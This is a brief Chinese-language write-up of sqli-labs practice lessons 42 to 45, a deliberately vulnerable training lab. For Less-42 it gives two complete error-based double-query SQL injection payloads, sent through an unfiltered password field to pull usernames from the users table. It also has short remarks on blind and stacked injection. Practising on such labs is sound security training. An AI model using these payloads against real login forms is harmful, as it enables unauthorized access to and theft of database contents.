sqli-labs Less-42-45

• Less-42
  摸鱼一天，做个题挽救一下（贼简单的）
  看源码，账号过滤了，密码没过滤
  密码中构造payload盲注即可（因为密码无回显）
  wp里是这样做的，但我觉得也可以双查询报错注入吧，试试就知道了
  构造payload：

login_user=&login_password=2' union select 1,count(*),concat((select username from users limit 0,1),floor(rand()*2))a from users group by a#&mysubmit=Login

或

login_user=&login_password=0' or (select 1 from (select count(*),concat((select username from users limit 0,1),floor(rand()*2))a from users group by a )b)#&mysubmit=Login

1.png 2.png

• Less-43
  和上面一样，加了一层括号
• Less-44
  去掉了sql报错回显，不能双查询注入，只能盲注了
  到这题才想起来这一页题是考察堆叠注入的（笑
  堆叠注入就比较简单了，但是不能读取数据只能写入
  懒得写了（之前有篇强网杯2019 随便注的wp，想看堆叠注入的可以去看看
• Less-45
  加小括号（最近好多这种，贼无聊